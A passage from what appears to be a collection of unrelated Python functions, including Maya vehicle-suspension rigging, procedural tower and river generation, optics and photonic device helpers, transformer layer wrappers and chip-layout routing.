ln='camber', k=1, min=-10, max=10)\n mc.addAttr(steering_grp, ln='toe', min=-10, max=10, k=1)\n\n l_prefix = prefix.replace('C','L', 1)\n r_prefix = prefix.replace('C','R', 1)\n\n default_lock_value = utils.get_distance(l_prefix+'_shock_A_JNT', l_prefix+'_shock_B_JNT') * 0.333\n\n mc.addAttr(steering_grp, ln='suspensionExtensionMax', k=1, min=0,dv= default_lock_value)\n mc.addAttr(steering_grp, ln='suspensionCompressionMax', k=1, min=0,dv= default_lock_value)\n mc.addAttr(steering_grp, ln='steeringAngleMax', min=0, dv=45, k=1)\n\n mc.addAttr(steering_grp, ln='autoSteering', min=0, max=1, k=1)\n mc.addAttr(steering_grp, ln='autoWheel', min=0, max=1, k=1)\n mc.addAttr(steering_grp, ln='autoSteerAmount', k=0)\n\n mc.addAttr(steering_grp, ln='connectXforms', at='message')\n\n driver_jnt = mc.createNode('joint', n=prefix+'_chassis_driver_JNT', p=jnt_grps[2])\n mc.pointConstraint(l_prefix+'_lowerArm_end_JNT', r_prefix+'_lowerArm_end_JNT', driver_jnt)\n\n mirror_values = [1, -1]\n for mi, prefix in enumerate([l_prefix, r_prefix]):\n\n mirror_value = mirror_values[mi]\n\n # Create ctrls\n chassis_ctrl = hooks[1]\n\n up_strut = prefix+'_shock_A_JNT'\n lo_strut = prefix+'_shock_B_JNT'\n up_strut_end = prefix+'_shock_A_end_JNT'\n lo_strut_end = prefix+'_shock_B_end_JNT'\n steer_jnt = prefix+'_steeringArm_JNT'\n up_control_arm = prefix+'_upperArm_JNT'\n up_control_arm_end = prefix+'_upperArm_end_JNT'\n\n lo_control_arm = prefix+'_lowerArm_JNT'\n lo_control_arm_end = prefix+'_lowerArm_end_JNT'\n\n spindle = prefix+'_wheelhub_JNT'\n wheel_hub = prefix+'_wheelhub_end_JNT'\n steering_assembly = prefix+'_steeringArm_JNT'\n\n # Create ctrls\n loc = utils.snap_locator(steering_assembly )\n mc.delete(mc.aimConstraint(up_control_arm, loc, aim=[0,1,0], u=[0,0,1], wu=[0,0,1], wut='vector'))\n wheel_zero, wheel_ctrl, wheel_offsets, wheel_last_node = self.anim_ctrl(prefix+'_wheel_CTL', match_position=loc, node_type='transform')\n mc.delete(loc)\n\n loc = utils.snap_locator(prefix+'_ground_CTL_REF')\n ground_zero, ground_ctrl, ground_offsets, ground_last_node = self.anim_ctrl(prefix+'_ground_CTL', match_position=loc, node_type='transform')\n mc.delete(loc)\n\n mc.setAttr(wheel_ctrl+'.ro', 2)\n\n # wheel spin\n auto_wheel_off = mc.createNode('transform', p=spindle, n=wheel_ctrl+'_AUTO_OFF')\n auto_wheel = mc.createNode('transform', p=auto_wheel_off, n=wheel_ctrl+'_AUTO')\n mc.parent(auto_wheel_off, wheel_ctrl)\n\n mc.parent(wheel_offsets[0], auto_wheel)\n mc.makeIdentity(wheel_offsets[0], apply=1, t=1, r=1, s=1, n=0, pn=1)\n mc.xform(wheel_offsets[0], piv=(0,0,0))\n\n mc.orientConstraint(wheel_offsets[0], spindle)\n\n # wheel ctrl limits\n ctrls = [wheel_ctrl+'_CONST', wheel_ctrl+'_MOCAP', wheel_ctrl+'_OFF', wheel_ctrl]\n for ct in ctrls:\n mc.transformLimits(ct, tx=[0,0], ty=[0,0], etx=[1,1], ety=[1,1], tz=[0,0], etz=[1,1])\n mc.connectAttr(steering_grp+'.suspensionCompressionMax', ct+'.maxTransXLimit')\n utils.connect_negative(steering_grp+'.suspensionExtensionMax', ct+'.minTransXLimit')\n\n mc.connectAttr(steering_grp+'.suspensionCompressionMax', ct+'.maxTransYLimit')\n utils.connect_negative(steering_grp+'.suspensionExtensionMax', ct+'.minTransYLimit')\n\n mc.connectAttr(steering_grp+'.suspensionCompressionMax', ct+'.maxTransZLimit')\n utils.connect_negative(steering_grp+'.suspensionExtensionMax', ct+'.minTransZLimit')\n\n # wheel and ground\n mc.parent(wheel_zero, ground_zero, ctrl_grps[1])\n mc.pointConstraint(ground_last_node, wheel_ctrl+'_CONST', mo=1, skip=['x','z'])\n\n # lower control arm\n ik = mc.ikHandle(sj=lo_control_arm, ee=lo_control_arm_end)[0]\n mc.parent(ik, jnt_grps[2])\n mc.hide(ik)\n\n mc.parentConstraint(wheel_ctrl, lo_control_arm, mo=1)\n\n # up ctrl arm\n ik = mc.ikHandle(sj=up_control_arm, ee=up_control_arm_end)[0]\n mc.parent(ik, driver_jnt)\n mc.parentConstraint(wheel_ctrl, up_control_arm, mo=1)\n mc.hide(ik)\n\n # orient chassis loc\n\n # strut\n mc.parent(up_strut, driver_jnt)\n sloc = utils.snap_locator(lo_strut, name=up_strut+'_AIM_GRP', node_type='transform')\n mc.aimConstraint(sloc, up_strut, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='objectRotation', wuo=driver_jnt)\n mc.parent(sloc, lo_control_arm)\n mc.pointConstraint(sloc, lo_strut)\n\n # streering assembly orientation ############################################\n mc.parent(steer_jnt, lo_control_arm)\n mc.parentConstraint(wheel_ctrl, steer_jnt, mo=1)\n\n # streering assembly orientation, steering and toe ############################################\n for ct in ctrls:\n mc.transformLimits(ct, rx=[0,0], ry=[0,0], erx=[1,1], ery=[1,1], rz=[0,0], erz=[1,1])\n mc.connectAttr(steering_grp+'.steeringAngleMax', ct+'.maxRotXLimit')\n utils.connect_negative(steering_grp+'.steeringAngleMax', ct+'.minRotXLimit')\n\n mc.connectAttr(steering_grp+'.steeringAngleMax', ct+'.maxRotYLimit')\n utils.connect_negative(steering_grp+'.steeringAngleMax', ct+'.minRotYLimit')\n\n mc.connectAttr(steering_grp+'.steeringAngleMax', ct+'.maxRotZLimit')\n utils.connect_negative(steering_grp+'.steeringAngleMax', ct+'.minRotZLimit')\n\n # steering\n pma = mc.createNode('plusMinusAverage')\n if options.get('enableSteering'):\n\n aim = mc.createNode('transform', p=wheel_ctrl+'_CONST', n =wheel_ctrl+'_MOCAP_AIM')\n mc.setAttr(aim+'.ty', 10)\n mc.aimConstraint(aim, wheel_ctrl+'_MOCAP', aim=[0,1,0], u=[1,0,0], wu=[1,0,0], wuo=world_grp, wut='objectRotation')\n\n sr = mc.createNode('setRange')\n mc.connectAttr(steering_grp+'.tx', sr+'.vx')\n mc.connectAttr(steering_grp+'.steeringAngleMax', sr+'.maxX', f=1)\n utils.connect_negative(steering_grp+'.steeringAngleMax', sr+'.minX')\n mc.setAttr(sr+'.oldMinX', -10)\n mc.setAttr(sr+'.oldMaxX', 10)\n\n mc.connectAttr(sr+'.outValueX', pma+'.input1D[0]')\n\n # toe\n sr = mc.createNode('setRange')\n mc.connectAttr(steering_grp+'.toe', sr+'.vx')\n mc.connectAttr(steering_grp+'.steeringAngleMax', sr+'.maxX', f=1)\n utils.connect_negative(steering_grp+'.steeringAngleMax', sr+'.minX')\n mc.setAttr(sr+'.oldMinX', -10)\n mc.setAttr(sr+'.oldMaxX', 10)\n\n if mirror_value == 1:\n utils.connect_negative(sr+'.outValueX', pma+'.input1D[1]')\n else:\n mc.connectAttr(sr+'.outValueX', pma+'.input1D[1]')\n\n mc.connectAttr(pma+'.output1D', wheel_ctrl+'_OFF.ry')\n\n # autp steering setup\n cl = mc.createNode('clamp')\n mdl = mc.createNode('multDoubleLinear')\n utils.connect_negative(steering_grp+'.steeringAngleMax', cl+'.minR')\n mc.connectAttr(steering_grp+'.steeringAngleMax', cl+'.maxR')\n mc.connectAttr(steering_grp+'.autoSteerAmount', cl+'.inputR')\n\n mc.connectAttr(cl+'.outputR', mdl+'.i1')\n mc.connectAttr(steering_grp+'.autoSteering', mdl+'.i2')\n\n mc.connectAttr(mdl+'.o', pma+'.input1D[2]')\n\n # steering arm piston\n aim = utils.snap_locator(prefix+'_steeringArm_B_JNT', name=prefix+'_steering_A_AIM', node_type='transform')\n mc.parent(aim, steer_jnt)\n mc.parent(prefix+'_steeringArm_A_JNT', driver_jnt)\n mc.pointConstraint(aim, prefix+'_steeringArm_B_JNT')\n mc.aimConstraint(aim, prefix+'_steeringArm_A_JNT', aim=[mirror_value, 0,0], u=[0,1,0], wu=[0,1,0], wuo=driver_jnt, wut='objectRotation')\n\n # camber\n sr = mc.createNode('setRange')\n mc.connectAttr(steering_grp+'.camber', sr+'.vx')\n mc.connectAttr(steering_grp+'.steeringAngleMax', sr+'.maxX', f=1)\n utils.connect_negative(steering_grp+'.steeringAngleMax', sr+'.minX')\n mc.setAttr(sr+'.oldMinX', -10)\n mc.setAttr(sr+'.oldMaxX', 10)\n\n if mirror_value == 1:\n utils.connect_negative(sr+'.outValueX', wheel_ctrl+'_OFF.rz')\n else:\n mc.connectAttr(sr+'.outValueX', wheel_ctrl+'_OFF.rz')\n\n # autowheel\n mc.addAttr(auto_wheel, ln='autoSpin', k=1)\n mc.connectAttr(auto_wheel+'.autoSpin', auto_wheel+'.rx')\n\n driver = utils.snap_locator(spindle, name=prefix+'_autoWheel_DRV', node_type='transform')\n mc.parent(driver, steer_jnt)\n connect_auto_wheel(driver, steering_grp, auto_wheel+'.autoSpin', world_scale_node=hooks[0])\n\n utils.set_attrs(wheel_ctrl, 'rx s', l=1, k=0)\n if not options.get('enableSteering'):\n utils.set_attrs(wheel_ctrl, 'ry', l=1, k=0)", "def aecSpaceRandomTowers():\n origin = aecPoint(0, 0, 0)\n displace = 175\n spacer = aecSpacer()\n shaper = aecShaper()\n \n def full(point, xWidth, yDepth, zHeight, level):\n floor = aecSpace()\n floor.boundary = shaper.makeBox(point, xWidth, yDepth)\n floor.height = zHeight\n floor.level = level\n setColors([floor])\n return [floor]\n \n def halfDepth(point, xWidth, yDepth, zHeight, level):\n depth = yDepth * 0.5\n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, xWidth, depth)\n half1.height = zHeight\n half1.level = level\n halfSpaces = [half1] + spacer.row(half1, xAxis = False)\n setColors(halfSpaces)\n return halfSpaces\n \n def halfWidth(point, xWidth, yDepth, zHeight, level):\n width = xWidth * 0.5\n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, width, yDepth)\n half1.height = zHeight\n half1.level = level\n halfSpaces = [half1] + spacer.row(half1)\n setColors(halfSpaces)\n return halfSpaces\n \n def quarterDepth(point, xWidth, yDepth, zHeight, level):\n if randint(0, 1) == 0:\n depth = yDepth * 0.25\n scale = 3\n else:\n depth = yDepth * 0.75\n scale = 0.333333333 \n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, xWidth, depth)\n half1.height = zHeight\n half1.level = level \n halfSpaces = [half1] + spacer.row(half1, xAxis = False)\n halfSpaces[1].scale(1, scale, 1, halfSpaces[1].points_floor[0])\n setColors(halfSpaces)\n return halfSpaces\n \n def quarterWidth(point, xWidth, yDepth, zHeight, level):\n if randint(0, 1) == 0:\n width = xWidth * 0.25\n scale = 3\n else:\n width = xWidth * 0.75\n scale = 0.333333333 \n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, width, yDepth)\n half1.height = zHeight\n half1.level = level \n halfSpaces = [half1] + spacer.row(half1)\n halfSpaces[1].scale(scale, 1, 1, halfSpaces[1].points_floor[0])\n setColors(halfSpaces)\n return halfSpaces\n \n def setColors(halfSpaces):\n colors = [aecColor.blue, aecColor.orange, aecColor.purple, aecColor.yellow]\n colorPick = randint(0, 3)\n halfSpaces[0].color = colors[colorPick]\n if len(halfSpaces) == 1: return\n colors.reverse()\n halfSpaces[1].color = colors[colorPick]\n \n def makeFloor(point, xWidth, yDepth, zHeight, level):\n floorType = randint(0, 4)\n if floorType == 0: floorSpaces = full(point, xWidth, yDepth, zHeight, level)\n if floorType == 1: floorSpaces = halfDepth(point, xWidth, yDepth, zHeight, level)\n if floorType == 2: floorSpaces = halfWidth(point, xWidth, yDepth, zHeight, level)\n if floorType == 3: floorSpaces = quarterDepth(point, xWidth, yDepth, zHeight, level)\n if floorType == 4: floorSpaces = quarterWidth(point, xWidth, yDepth, zHeight, level)\n return floorSpaces\n \n def makeCore(point, xWidth, yDepth, zHeight): \n xCoord = (point.x - 5) + (xWidth * 0.5)\n yCoord = (point.y + (yDepth * (randint(0, 9) * 0.1)))\n point = aecPoint(xCoord, yCoord, point.z)\n core = aecSpace()\n core.boundary = shaper.makeBox(point, 10, 20)\n core.height = zHeight\n core.color = aecColor.gray\n return [core]\n \n def makeTower(point):\n floors = []\n xWidth = uniform(20, 60)\n yDepth = uniform(20, 60)\n levels = randint(5, 50)\n zHeight = uniform(3, 6)\n plinth = aecSpace()\n plinth.boundary = shaper.makeBox(point, xWidth, yDepth)\n plinthScaleX = (uniform(1, 2.5))\n plinthScaleY = (uniform(1, 2.5))\n plinth.scale(plinthScaleX, plinthScaleY, 2, plinth.centroid_floor)\n plinth.height = (zHeight * 2)\n plinth.color = aecColor.green\n floors.append(plinth)\n floors = floors + makeCore(point, xWidth, yDepth, zHeight * (levels + 3))\n level = (zHeight * 2)\n x = 0\n while x < levels:\n floors = floors + makeFloor(point, xWidth, yDepth, zHeight, level)\n level += zHeight\n x += 1 \n return floors\n \n def makeTowerRow(point, columns, displacement):\n towers = []\n towers = towers + makeTower(point)\n x = 0\n while x < columns:\n point.x += displacement\n towers = towers + makeTower(point)\n x += 1\n return towers\n \n def makeTowerRows(point, displacement, columns, rows):\n towers = []\n x = 0\n while x < rows:\n towers = towers + makeTowerRow(point, columns, displacement)\n point.x = 0\n point.y += displacement\n x += 1\n return towers\n \n return makeTowerRows(origin, displace, 4, 5)", "def expand_slicer_aperture(system):\n\n # First of all, we need to find the Surface Number for the IMAGE SLICER\n N_surfaces = system.LDE.NumberOfSurfaces\n surface_names = {} # A dictionary of surface number -> surface comment\n for k in np.arange(1, N_surfaces):\n surface_names[k] = system.LDE.GetSurfaceAt(k).Comment\n # find the Slicer surface number\n try:\n # The naming convention for this surface has changed. Not the same for Nominal Design as Monte Carlos\n slicer_num = list(surface_names.keys())[list(surface_names.values()).index('Slicer Mirror')]\n except ValueError:\n slicer_num = list(surface_names.keys())[list(surface_names.values()).index('IFU ISA')]\n slicer = system.LDE.GetSurfaceAt(slicer_num)\n\n # Read Current Aperture Settings\n apt_type = slicer.ApertureData.CurrentType\n # print(\"Aperture type: \", apt_type)\n if apt_type == 4: # 4 is Rectangular aperture\n current_apt_sett = slicer.ApertureData.CurrentTypeSettings\n # print(\"Current Settings:\")\n x0 = current_apt_sett._S_RectangularAperture.XHalfWidth\n y0 = current_apt_sett._S_RectangularAperture.YHalfWidth\n # If the Y aperture hasn't been changed already, we change it here to 999 mm to get all rays through\n if y0 != 999:\n # Change Settings\n aperture_settings = slicer.ApertureData.CreateApertureTypeSettings(\n constants.SurfaceApertureTypes_RectangularAperture)\n aperture_settings._S_RectangularAperture.XHalfWidth = x0\n aperture_settings._S_RectangularAperture.YHalfWidth = 999\n slicer.ApertureData.ChangeApertureTypeSettings(aperture_settings)\n\n current_apt_sett = slicer.ApertureData.CurrentTypeSettings\n # Notify that we have successfully modified the aperture\n print(\"Changing aperture of surface: \", slicer.Comment)\n print(\"New Settings:\")\n print(\"X_HalfWidth = %.2f\" % current_apt_sett._S_RectangularAperture.XHalfWidth)\n print(\"Y_HalfWidth = %.2f\" % current_apt_sett._S_RectangularAperture.YHalfWidth)\n\n return", "def arm(self):\n pass", "def taper(length = 10, width1 = 5, width2 = None, port = None, layer = 0):\n if type(port) is Port and width1 is None: width1 = port.width\n if width2 is None: width2 = width1\n xpts = [0, length, length, 0]\n ypts = [width1/2, width2/2, -width2/2, -width1/2]\n\n D = Device('taper')\n D.add_polygon([xpts, ypts], layer = layer)\n D.add_port(name = 1, midpoint = [0, 0],\n width = width1, orientation = 180)\n D.add_port(name = 2, midpoint = [length, 0],\n width = width2, orientation = 0)\n if type(port) is Port:\n D.rotate(angle = port.orientation, center = [0, 0])\n D.move(origin = [0, 0], destination = port.midpoint)\n return D", "def add_river_greedy(me, lm, material_dict, imgs, rounded_river,\n min_length):\n print(\" Building random river...\")\n cell_source = get_river_source(material_dict)\n if not(cell_source):\n print(\"no cell source\")\n return\n xi,yi = cell_source\n cell_source = lm.cells[xi][yi]\n path = [cell_source]\n cell_xy = cell_source\n maxn = 1000\n it = 0\n should_finish = False\n margin = 0.01\n lake_probability = 0.5\n while True:\n if it > maxn:\n break\n elif \"water\" in cell_xy.material.name.lower():\n break\n elif should_finish:\n break\n it += 1\n section_length = random.randint(2,10)\n if random.random() < 0.5:\n sign = 1\n else:\n sign = -1\n if random.random() < 0.5:\n dx, dy = sign, 0\n else:\n dx, dy = 0, sign\n## print(dx,dy,section_length)\n ################################################\n for i in range(section_length):\n if should_finish:\n break\n x = cell_xy.coord[0] + dx\n y = cell_xy.coord[1] + dy\n new_cell = lm.get_cell_at(x,y)\n if new_cell is None:\n break\n elif new_cell.h - margin > cell_xy.h:\n if cell_xy.material.name != new_cell.material.name:\n break\n elif new_cell in path:\n break\n elif new_cell.name != \"river\":\n is_valid = True\n for neigh in new_cell.get_neighbors_von_neuman():\n if neigh:\n if not(neigh is cell_xy):\n if neigh.name == \"river\":\n is_valid = False\n break\n elif \"water\" in neigh.material.name.lower():\n should_finish = True\n elif neigh in path:\n is_valid = False\n break\n if is_valid:\n cell_xy = new_cell\n path.append(new_cell)\n## print(\"OK\",dx,dy,section_length)\n else:\n break\n else:\n break\n #4) change the end to first shallow shore cell\n actual_path = []\n for cell in path:\n if cell.name == \"river\":\n break\n actual_path.append(cell)\n if \"water\" in cell.material.name.lower():\n break\n else: #LAKE ?\n next_to_water = False\n for neigh in cell.get_neighbors_von_neuman():\n if neigh:\n if \"water\" in neigh.material.name.lower():\n next_to_water = True\n break\n if next_to_water:\n break\n if len(actual_path) < min_length:\n return\n if actual_path[0].material.name == actual_path[-1].material.name:\n return\n elif not(\"water\" in actual_path[-1].material.name.lower()):\n if random.random() < lake_probability:\n pass\n else:\n return\n #build images of river\n objs = {}\n for delta in imgs: #imgs[(dx,dy)][zoom]\n river_obj = MapObject(me, imgs[delta][0], \"river\", 1.)\n river_obj.is_ground = True\n river_obj.lm = lm\n objs[delta] = river_obj\n #5) add river cells to map and layer\n for i,cell in enumerate(actual_path):\n prepare_cell_for_river(lm, cell)\n dx,dy,corner = get_path_orientation(i, cell, actual_path)\n if rounded_river:\n c = objs.get((dx,dy,corner))\n else:\n c = objs.get((dx,dy,None))\n if not c:\n raise Exception(\"No river object for delta\", dx, dy, corner)\n assert cell.name != \"river\"\n c = c.add_copy_on_cell(cell)\n cell.name = \"river\"\n lm.static_objects.append(c)\n\n if actual_path:\n## print(\"RIVER BUILT:\", [cell.coord for cell in actual_path])\n if not(\"water\" in actual_path[-1].material.name.lower()):\n for neigh in actual_path[-1].get_neighbors_moore():\n if neigh and neigh.name != \"river\":\n prepare_cell_for_river(lm, neigh)\n river_obj = MapObject(me, imgs[(0,0,None)][0], \"river\", 1.)\n river_obj.is_ground = True\n river_obj.lm = lm\n river_obj = river_obj.add_copy_on_cell(neigh)\n neigh.name = \"river\"\n lm.static_objects.append(river_obj)\n return objs", "def __init__(self, mbart_layer, config):\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([mbart_layer.self_attn.q_proj.weight, mbart_layer.self_attn.k_proj.weight, mbart_layer.self_attn.v_proj.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([mbart_layer.self_attn.q_proj.bias, mbart_layer.self_attn.k_proj.bias, mbart_layer.self_attn.v_proj.bias]))\n self.out_proj_weight = mbart_layer.self_attn.out_proj.weight\n self.out_proj_bias = mbart_layer.self_attn.out_proj.bias\n self.linear1_weight = mbart_layer.fc1.weight\n self.linear1_bias = mbart_layer.fc1.bias\n self.linear2_weight = mbart_layer.fc2.weight\n self.linear2_bias = mbart_layer.fc2.bias\n self.norm1_eps = mbart_layer.self_attn_layer_norm.eps\n self.norm1_weight = mbart_layer.self_attn_layer_norm.weight\n self.norm1_bias = mbart_layer.self_attn_layer_norm.bias\n self.norm2_eps = mbart_layer.final_layer_norm.eps\n self.norm2_weight = mbart_layer.final_layer_norm.weight\n self.norm2_bias = mbart_layer.final_layer_norm.bias\n self.num_heads = mbart_layer.self_attn.num_heads\n self.embed_dim = mbart_layer.self_attn.embed_dim\n self.is_last_layer = False\n self.norm_first = True\n self.validate_bettertransformer()", "def initialize_full_optimization(self):\n # Do some setup\n self.debumper.cells = cells.Cells(5)\n self.debumper.cells.assign_cells(self.biomolecule)\n self.biomolecule.calculate_dihedral_angles()\n self.biomolecule.set_donors_acceptors()\n self.biomolecule.update_internal_bonds()\n self.biomolecule.set_reference_distance()\n self.optlist = []\n self.atomlist = []\n # First initialize the various types\n for residue in self.biomolecule.residues:\n optinstance = self.is_optimizeable(residue)\n if isinstance(residue, aa.Amino):\n residue.fixed = (\n 1 if False in residue.stateboolean.values() else 0\n )\n if optinstance is None:\n continue\n\n type_ = optinstance.opttype\n if residue.fixed != 1:\n klass = getattr(structures, type_)\n myobj = klass(residue, optinstance, self.debumper)\n self.atomlist += myobj.atomlist\n self.optlist.append(myobj)\n self.resmap[residue] = myobj\n _LOGGER.debug(\"Done.\")", "def ramp(length = 10, width1 = 5, width2 = 8, layer = 0):\n if width2 is None: width2 = width1\n xpts = [0, length, length, 0]\n ypts = [width1, width2, 0, 0]\n D = Device('ramp')\n D.add_polygon([xpts, ypts], layer = layer)\n D.add_port(name = 1, midpoint = [0, width1/2],\n width = width1, orientation = 180)\n D.add_port(name = 2, midpoint = [length, width2/2],\n width = width2, orientation = 0)\n return D", "def weight4width(box_width,platformWidth,stairsLength,stepCount,stepWidth):\n if (platformWidth-stairsLength)<0:\n platformWidth = stairsLength + 50 #platform width must larger than stairs length ,the value is 50\n return platformWidth\n else:return platformWidth", "def tail_joiner(self):\n\n # Fusing Right Horizontal Tail:\n shape_in_r = Fused(shape_in=self.stabilizer_h.solid, tool=self.stabilizer_vright.solid)\n shape_out_r = Fused(shape_in=shape_in_r, tool=self.connector_right)\n\n # Fusing Left Horizontal Tail:\n shape_in_l = Fused(shape_in=self.stabilizer_h.ht_mirror, tool=self.stabilizer_vleft.solid)\n shape_out_l = Fused(shape_in=shape_in_l, tool=self.connector_left)\n\n shape_out = Fused(shape_in=shape_out_r, tool=shape_out_l)\n\n return shape_out", "def monolayer_4band():\n a = 0.222\n ax = 0.438\n ay = 0.332\n theta = 96.79 * (pi / 180)\n phi = 103.69 * (pi / 180)\n\n lat = pb.Lattice(a1=[ax, 0], a2=[0, ay])\n\n h = a * sin(phi - pi / 2)\n s = 0.5 * ax - a * cos(theta / 2)\n lat.add_sublattices(\n ('A', [0, 0, h], 0),\n ('B', [s, 0, 0], 0),\n ('C', [ax/2, ay/2, 0], 0),\n ('D', [ax/2 + s, ay/2, h], 0)\n )\n\n lat.register_hopping_energies({\n 't1': -1.22,\n 't2': 3.665,\n 't3': -0.205,\n 't4': -0.105,\n 't5': -0.055\n })\n\n lat.add_hoppings(\n # t1\n ([-1, 0], 'A', 'D', 't1'),\n ([-1, -1], 'A', 'D', 't1'),\n ([ 0, 0], 'B', 'C', 't1'),\n ([ 0, -1], 'B', 'C', 't1'),\n # t2\n ([ 0, 0], 'A', 'B', 't2'),\n ([ 0, 0], 'C', 'D', 't2'),\n # t3\n ([ 0, 0], 'A', 'D', 't3'),\n ([ 0, -1], 'A', 'D', 't3'),\n ([ 1, 1], 'C', 'B', 't3'),\n ([ 1, 0], 'C', 'B', 't3'),\n # t4\n ([ 0, 0], 'A', 'C', 't4'),\n ([ 0, -1], 'A', 'C', 't4'),\n ([-1, 0], 'A', 'C', 't4'),\n ([-1, -1], 'A', 'C', 't4'),\n ([ 0, 0], 'B', 'D', 't4'),\n ([ 0, -1], 'B', 'D', 't4'),\n ([-1, 0], 'B', 'D', 't4'),\n ([-1, -1], 'B', 'D', 't4'),\n # t5\n ([-1, 0], 'A', 'B', 't5'),\n ([ 0, 1], 'A', 'B', 't5'),\n ([ 0, -1], 'A', 'B', 't5'),\n ([-1, 0], 'C', 'D', 't5'),\n ([ 0, 1], 'C', 'D', 't5'),\n ([ 0, -1], 'C', 'D', 't5'),\n )\n\n return lat", "def __init__(self, bart_layer, config):\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bart_layer.self_attn.q_proj.weight, bart_layer.self_attn.k_proj.weight, bart_layer.self_attn.v_proj.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bart_layer.self_attn.q_proj.bias, bart_layer.self_attn.k_proj.bias, bart_layer.self_attn.v_proj.bias]))\n self.out_proj_weight = bart_layer.self_attn.out_proj.weight\n self.out_proj_bias = bart_layer.self_attn.out_proj.bias\n self.linear1_weight = bart_layer.fc1.weight\n self.linear1_bias = bart_layer.fc1.bias\n self.linear2_weight = bart_layer.fc2.weight\n self.linear2_bias = bart_layer.fc2.bias\n self.norm1_eps = bart_layer.self_attn_layer_norm.eps\n self.norm1_weight = bart_layer.self_attn_layer_norm.weight\n self.norm1_bias = bart_layer.self_attn_layer_norm.bias\n self.norm2_eps = bart_layer.final_layer_norm.eps\n self.norm2_weight = bart_layer.final_layer_norm.weight\n self.norm2_bias = bart_layer.final_layer_norm.bias\n self.num_heads = bart_layer.self_attn.num_heads\n self.embed_dim = bart_layer.self_attn.embed_dim\n self.is_last_layer = False\n self.validate_bettertransformer()", "def initialize():\n initialize_gripper()\n assert right_gripper.is_ready()\n print(\"Initialized gripper\")\n rospy.sleep(2.0)\n add_constraint('right_wall', 0, right_wall_dist, 0, 4, 0.1, 4) \n add_constraint('left_wall', 0, left_wall_dist, 0, 4, 0.1, 4)\n add_constraint('back_wall', back_wall_dist, 0, 0,0.1, 4, 4)\n #self.add_constraint('table', 0,308, 0, -0.115, 4, 4, 0.1 )\n mouth_pose = get_mouth_pose()\n #add_constraint('person',mouth_pose.x, mouth_pose.y, mouth_pose.z, 4,4,4)", "def stretch(self, x_stretch=1, y_stretch=1):\n self.width *= x_stretch\n self.height *= y_stretch\n\n # Always update the corners after operation\n self.update_corners()\n return", "def RoomyStrategy(I_list,box_list):\n SortedItems = quick_sort(I_list)\n lemon = []\n iso = 0\n for element in range(0, len(SortedItems)):\n w = SortedItems[element].weight\n x = FindMaxCap(box_list)\n if w <= x.max_cap - x.curr_cap:\n x.curr_cap += w\n x.items_list.append(SortedItems[element])\n lemon.append(SortedItems[element])\n iso+=1\n else:\n pass\n print('Results from Greedy Strategy 1')\n if len(SortedItems) == iso:\n print('All items successfully packed into boxes!')\n else:\n print('Unable to pack all items!')\n for box in box_list:\n print('Box',box.id,'of weight capacity',box.max_cap,'contains:')\n for item in box.items_list:\n print(item.name,'of weight',item.weight)\n for item in SortedItems:\n if item not in lemon:\n print(item.name,'of weight',item.weight,'got left behind')\n print('\\n')", "def route_gnd(self):\n \n gnd_start = self.rbl_inv_inst.get_pin(\"gnd\").bc()\n gnd_end = vector(gnd_start.x, self.rbl_inst.uy()+2*self.m2_pitch)\n \n # Add a rail in M1 from bottom of delay chain to two above the RBL\n # This prevents DRC errors with vias for the WL\n dc_top = self.dc_inst.ur()\n self.add_segment_center(layer=\"metal1\",\n start=vector(gnd_start.x, dc_top.y),\n end=gnd_end)\n\n # Add a rail in M2 from RBL inverter to two above the RBL\n self.add_segment_center(layer=\"metal2\",\n start=gnd_start,\n end=gnd_end)\n \n # Add pin from bottom to RBL inverter\n self.add_layout_pin_center_segment(text=\"gnd\",\n layer=\"metal1\",\n start=gnd_start.scale(1,0),\n end=gnd_start)\n \n # Connect the WL pins directly to gnd\n gnd_pin = self.get_pin(\"gnd\").rc()\n for row in range(self.bitcell_loads):\n wl = \"wl[{}]\".format(row)\n pin = self.rbl_inst.get_pin(wl)\n start = vector(gnd_pin.x,pin.cy())\n self.add_segment_center(layer=\"metal1\",\n start=start,\n end=pin.lc())\n self.add_via_center(layers=(\"metal1\", \"via1\", \"metal2\"),\n offset=start)\n\n # Add via for the delay chain\n offset = self.dc_inst.get_pins(\"gnd\")[0].bc() + vector(0.5*contact.m1m2.width,0.5*contact.m1m2.height)\n self.add_via_center(layers=(\"metal1\", \"via1\", \"metal2\"),\n offset=offset)\n\n # Add via for the inverter\n offset = self.rbl_inv_inst.get_pin(\"gnd\").bc() - vector(0,0.5*contact.m1m2.height)\n self.add_via_center(layers=(\"metal1\", \"via1\", \"metal2\"),\n offset=offset)\n\n # Connect the bitcell gnd pins to the rail\n gnd_pins = self.get_pins(\"gnd\")\n gnd_start = gnd_pins[0].ul()\n rbl_gnd_pins = self.rbl_inst.get_pins(\"gnd\")\n # Add L shapes to each vertical gnd rail\n for pin in rbl_gnd_pins:\n if pin.layer != \"metal2\":\n continue\n gnd_end = pin.uc()\n gnd_mid = vector(gnd_end.x, gnd_start.y)\n self.add_wire((\"metal1\",\"via1\",\"metal2\"), [gnd_start, gnd_mid, gnd_end])\n gnd_start = gnd_mid\n \n\n # Add a second gnd pin to the second delay chain rail. No need for full length.\n dc_gnd_offset = self.dc_inst.get_pins(\"gnd\")[1].ll()\n self.add_layout_pin(text=\"gnd\",\n layer=\"metal1\",\n offset=dc_gnd_offset.scale(1,0),\n width=self.m1_width,\n height=self.delay_chain_offset.y)", "def build_guide(self, **kwargs):\n\n # This builds your guide master and updates your options\n self.create_guide_master(**kwargs)\n\n prefix = self.prefix # Naming prefix. Use this for every new node you create and there should be no name clashes.\n options = self.options # Build options\n mirror_value = self.mirror_value # 1.0 for left and center sided parts and -1.0 for right sided part.\n\n mc.setAttr(self.guide_master+'.offsetTranslateY', -0.2)\n\n l_prefix = prefix.replace('C','L', 1)\n r_prefix = prefix.replace('C','R', 1)\n mirror_values = [1, -1]\n enable_steering = options.get('enableSteering')\n\n colors = ['green', 'red']\n\n for mi, prefix in enumerate([l_prefix, r_prefix]):\n\n mirror_value = mirror_values[mi]\n color = colors[mi]\n\n l_main_zero, l_main_plc = self.guide_joint('main', alt_prefix=prefix, placer_only=1)\n\n # 